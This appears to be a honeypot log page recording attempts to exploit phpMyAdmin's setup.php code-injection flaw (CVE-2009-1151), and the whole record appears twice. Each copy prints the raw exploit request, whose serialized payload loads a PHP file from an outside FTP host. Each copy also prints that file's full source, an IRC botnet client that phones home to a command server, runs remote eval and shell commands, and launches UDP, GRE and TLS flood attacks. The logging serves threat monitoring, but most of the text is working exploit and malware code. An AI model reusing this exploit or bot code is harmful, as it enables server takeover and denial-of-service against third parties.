Location: Ontario, Waterloo (BlackBerry 14) (zipcode N2L)
rDNS: notassigned.cloudatcost.com
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.CVE
CVE-2009-1151Author
Adrian "pagvac" PastorPlugin ID
oosheefee1baixeinief5nociu5shohhPOST /myadmin/scripts/setup.php HTTP/1.1
Content-Length: 235
cookie2: $Version="1"
Host: 150.152.32.232:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://150.152.32.232:8080/myadmin/scripts/setup.php
cookie: phpMyAdmin=8b9c125f60efa70aebe2644e6fcea070
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=6f7368443376d090ceb5915c78d2b83d&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A28%3A%22ftp%3A%2F%2F144%2E217%2E160%2E29%2FPMA%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: 05fc9af5ffbc8d487682d2275fdf4983
Type: text/x-php
Size: 19345
URL: ftp://144.217.160.29/PMA.php
Php IRC bot for phpmyadmin exploit
go to line 86 to edit irc info
<?php
set_time_limit(0);
error_reporting(0);
$dir = getcwd();
$uname= @php_uname();
function whereistmP()
{
$uploadtmp=ini_get('upload_tmp_dir');
$uf=getenv('USERPROFILE');
$af=getenv('ALLUSERSPROFILE');
$se=ini_get('session.save_path');
$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
if(is_dir($uf) && is_writable($uf))return $uf;
if(is_dir($af) && is_writable($af))return $af;
if(is_dir($se) && is_writable($se))return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
return '.';
}
function srvshelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$n=uniqid('NJ');
$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command,$ws)
{
$exec=$ws->exec("cmd.exe /c $command");
$so=$exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command)
{
$perl=new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec=ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command)
{
$exec=$output='';
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
if(function_exists('passthru')){ob_start();@passthru_($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;}
elseif(function_exists('shell_exec'))[email protected]_exec($command);
elseif(function_exists('popen')){[email protected]($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
elseif(function_exists('proc_open')){[email protected]_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}
elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=ffishelL($command);
elseif(extension_loaded('perl'))$exec=perlshelL($command);
return $exec;
}
class sell
{
var $config = array("server"=>"144.217.160.29", "port"=>"443", "key"=>"", "prefix"=>"DDOS-", "maxrand"=>"8", "chan"=>"#pma", "trigger"=>"-", "password"=>"bleed", "auth"=>"");
var $users = array();
function start()
{
while(true)
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) $this->start();
$pass = $this->config['password'];
$alph = range("0","9");
$this->send("PASS ".$pass."");
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $ident = "Windows";
else $ident = "Linux";
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
}
function main()
{
while(!feof($this->conn))
{
if(function_exists('stream_select'))
{
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
{
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0) break;
}
}
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :") { $this->send("PONG :".substr($this->buf,6)); continue; }
if(isset($cmd[1]) && $cmd[1] =="001") {
$this->auth($this->config['auth']);
$this->join($this->config['chan'],$this->config['key']);
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $this->join("#PMA");
else $this->join("#PMA");
continue;
}
if(isset($cmd[1]) && $cmd[1]=="443") { $this->set_nick(); continue; }
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick) for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i+1];
else for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i];
if(count($cmd)>2)
{
switch($cmd[1])
{
case "PRIVMSG":
if(substr($mcmd[0],0,1)=="-")
{
switch(substr($mcmd[0],1))
{
case "mail":
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: failed sending.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: sent.");
}
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "___":
$this->privmsg($this->config['chan'], "~http://" . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . "");
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: ".$uname." (safe: ".$safemode.")");
break;
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
case "eval":
ob_start();
eval(strstr($msg,$mcmd[1]));
$exec=ob_get_contents();
ob_end_clean();
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = exec($command);
$ret = explode("\n", $exec);
for ($i = 0; $i < count($ret); $i++)
if ($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "udp":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udptls":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udpstd":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udpflood":
if(count($mcmd)>4) { $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); }
break;
case "greflood":
if(count($mcmd)>4) { $this->greflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); }
break;
case "tcpconn":
if(count($mcmd)>3) { $this->tcpconn($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "die":
if(count($mcmd)>0) { fclose($this->conn); exit();}
break;
}
}
break;
}
}
}
}
}
function send($msg) { fwrite($this->conn,$msg."\r\n"); }
function join($chan,$key=NULL) { $this->send("JOIN ".$chan." ".$key); }
function auth($chan) { $this->send("PART ".$chan); }
function privmsg($to,$msg) { $this->send("PRIVMSG ".$to." :".$msg); }
function notice($to,$msg) { $this->send("NOTICE ".$to." :".$msg); }
function set_nick()
{
$prefix = "DDOS-%s";
$nickk = substr(str_shuffle("1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $this->config['maxrand']);
$this->nick = sprintf($prefix, $nickk);
$this->send("NICK ".$this->nick);
}
function udpstd($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!STD\2]");
$msgg = "STD";
for($i=0;$i<$packetsize;$i++) { $msgg .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$msgg);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2 std DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udp($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udptls($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("tls://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udpflood($host,$port,$time,$packetsize) {
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$multitarget = false;
if(strpos($host, ",") !== FALSE)
{
$multitarget = true;
$host = explode(",", $host);
}
$i = 0;
if($multitarget)
{
$fp = array();
foreach($host as $hostt) $fp[] = fsockopen("udp://".$hostt,$port,$e,$s,5);
$count = count($host);
while(true)
{
fwrite($fp[$i % $count],$packet);
fflush($fp[$i % $count]);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
foreach($fp as $fpp) fclose($fpp);
} else {
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS ENDED!\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function greflood($host,$port,$time,$packetsize) {
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$multitarget = false;
if(strpos($host, ",") !== FALSE)
{
$multitarget = true;
$host = explode(",", $host);
}
$i = 0;
if($multitarget)
{
$fp = array();
foreach($host as $hostt) $fp[] = fsockopen("gre://".$hostt,$port,$e,$s,5);
$count = count($host);
while(true)
{
fwrite($fp[$i % $count],$packet);
fflush($fp[$i % $count]);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
foreach($fp as $fpp) fclose($fpp);
} else {
$fp = fsockopen("gre://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS ENDED!\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function tcp($host,$port,$time)
{
$this->privmsg($this->config['chan'],"[\2tcp started!\2]");
$end = time() + $time;
$i = 0;
while($end > time())
{
$fp = fsockopen("tcp://".$host, $port, $e, $s, 5);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'],"[\2tcp Finished!\2]: sent ".$i." connections to $host:$port.");
}
}
$poll = new sell;
$poll->start();
?>
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
64.137.241.24
Dest. port: 8080
Time: 10/12/2018 06:39:44
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS31798 DataCity
Location: Ontario, Waterloo (BlackBerry 14) (zipcode N2L)
rDNS: notassigned.cloudatcost.com
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.CVE
CVE-2009-1151Author
Adrian "pagvac" PastorPlugin ID
oosheefee1baixeinief5nociu5shohhPOST /2phpmyadmin/scripts/setup.php HTTP/1.1
Content-Length: 235
cookie2: $Version="1"
Host: 150.152.32.232:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://150.152.32.232:8080/2phpmyadmin/scripts/setup.php
cookie: phpMyAdmin=8b9c125f60efa70aebe2644e6fcea070
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=6f7368443376d090ceb5915c78d2b83d&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A28%3A%22ftp%3A%2F%2F144%2E217%2E160%2E29%2FPMA%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: 05fc9af5ffbc8d487682d2275fdf4983
Type: text/x-php
Size: 19345
URL: ftp://144.217.160.29/PMA.php
Php IRC bot for phpmyadmin exploit
go to line 86 to edit irc info
<?php
set_time_limit(0);
error_reporting(0);
$dir = getcwd();
$uname= @php_uname();
function whereistmP()
{
$uploadtmp=ini_get('upload_tmp_dir');
$uf=getenv('USERPROFILE');
$af=getenv('ALLUSERSPROFILE');
$se=ini_get('session.save_path');
$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
if(is_dir($uf) && is_writable($uf))return $uf;
if(is_dir($af) && is_writable($af))return $af;
if(is_dir($se) && is_writable($se))return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
return '.';
}
function srvshelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$n=uniqid('NJ');
$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command,$ws)
{
$exec=$ws->exec("cmd.exe /c $command");
$so=$exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command)
{
$perl=new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec=ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command)
{
$exec=$output='';
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
if(function_exists('passthru')){ob_start();@passthru_($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;}
elseif(function_exists('shell_exec'))[email protected]_exec($command);
elseif(function_exists('popen')){[email protected]($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
elseif(function_exists('proc_open')){[email protected]_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}
elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=ffishelL($command);
elseif(extension_loaded('perl'))$exec=perlshelL($command);
return $exec;
}
class sell
{
var $config = array("server"=>"144.217.160.29", "port"=>"443", "key"=>"", "prefix"=>"DDOS-", "maxrand"=>"8", "chan"=>"#pma", "trigger"=>"-", "password"=>"bleed", "auth"=>"");
var $users = array();
function start()
{
while(true)
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) $this->start();
$pass = $this->config['password'];
$alph = range("0","9");
$this->send("PASS ".$pass."");
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $ident = "Windows";
else $ident = "Linux";
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
}
function main()
{
while(!feof($this->conn))
{
if(function_exists('stream_select'))
{
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
{
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0) break;
}
}
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :") { $this->send("PONG :".substr($this->buf,6)); continue; }
if(isset($cmd[1]) && $cmd[1] =="001") {
$this->auth($this->config['auth']);
$this->join($this->config['chan'],$this->config['key']);
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $this->join("#PMA");
else $this->join("#PMA");
continue;
}
if(isset($cmd[1]) && $cmd[1]=="443") { $this->set_nick(); continue; }
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick) for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i+1];
else for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i];
if(count($cmd)>2)
{
switch($cmd[1])
{
case "PRIVMSG":
if(substr($mcmd[0],0,1)=="-")
{
switch(substr($mcmd[0],1))
{
case "mail":
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: failed sending.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: sent.");
}
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "___":
$this->privmsg($this->config['chan'], "~http://" . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . "");
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: ".$uname." (safe: ".$safemode.")");
break;
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
case "eval":
ob_start();
eval(strstr($msg,$mcmd[1]));
$exec=ob_get_contents();
ob_end_clean();
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = exec($command);
$ret = explode("\n", $exec);
for ($i = 0; $i < count($ret); $i++)
if ($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "udp":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udptls":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udpstd":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udpflood":
if(count($mcmd)>4) { $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); }
break;
case "greflood":
if(count($mcmd)>4) { $this->greflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); }
break;
case "tcpconn":
if(count($mcmd)>3) { $this->tcpconn($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "die":
if(count($mcmd)>0) { fclose($this->conn); exit();}
break;
}
}
break;
}
}
}
}
}
function send($msg) { fwrite($this->conn,$msg."\r\n"); }
function join($chan,$key=NULL) { $this->send("JOIN ".$chan." ".$key); }
function auth($chan) { $this->send("PART ".$chan); }
function privmsg($to,$msg) { $this->send("PRIVMSG ".$to." :".$msg); }
function notice($to,$msg) { $this->send("NOTICE ".$to." :".$msg); }
function set_nick()
{
$prefix = "DDOS-%s";
$nickk = substr(str_shuffle("1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $this->config['maxrand']);
$this->nick = sprintf($prefix, $nickk);
$this->send("NICK ".$this->nick);
}
function udpstd($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!STD\2]");
$msgg = "STD";
for($i=0;$i<$packetsize;$i++) { $msgg .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$msgg);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2 std DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udp($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udptls($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("tls://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udpflood($host,$port,$time,$packetsize) {
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$multitarget = false;
if(strpos($host, ",") !== FALSE)
{
$multitarget = true;
$host = explode(",", $host);
}
$i = 0;
if($multitarget)
{
$fp = array();
foreach($host as $hostt) $fp[] = fsockopen("udp://".$hostt,$port,$e,$s,5);
$count = count($host);
while(true)
{
fwrite($fp[$i % $count],$packet);
fflush($fp[$i % $count]);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
foreach($fp as $fpp) fclose($fpp);
} else {
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS ENDED!\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function greflood($host,$port,$time,$packetsize) {
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$multitarget = false;
if(strpos($host, ",") !== FALSE)
{
$multitarget = true;
$host = explode(",", $host);
}
$i = 0;
if($multitarget)
{
$fp = array();
foreach($host as $hostt) $fp[] = fsockopen("gre://".$hostt,$port,$e,$s,5);
$count = count($host);
while(true)
{
fwrite($fp[$i % $count],$packet);
fflush($fp[$i % $count]);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
foreach($fp as $fpp) fclose($fpp);
} else {
$fp = fsockopen("gre://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS ENDED!\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function tcp($host,$port,$time)
{
$this->privmsg($this->config['chan'],"[\2tcp started!\2]");
$end = time() + $time;
$i = 0;
while($end > time())
{
$fp = fsockopen("tcp://".$host, $port, $e, $s, 5);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'],"[\2tcp Finished!\2]: sent ".$i." connections to $host:$port.");
}
}
$poll = new sell;
$poll->start();
?>
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
64.137.241.24
Dest. port: 8080
Time: 10/12/2018 05:38:09
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS31798 DataCity
Location: Ontario, Waterloo (BlackBerry 14) (zipcode N2L)
rDNS: notassigned.cloudatcost.com
Description
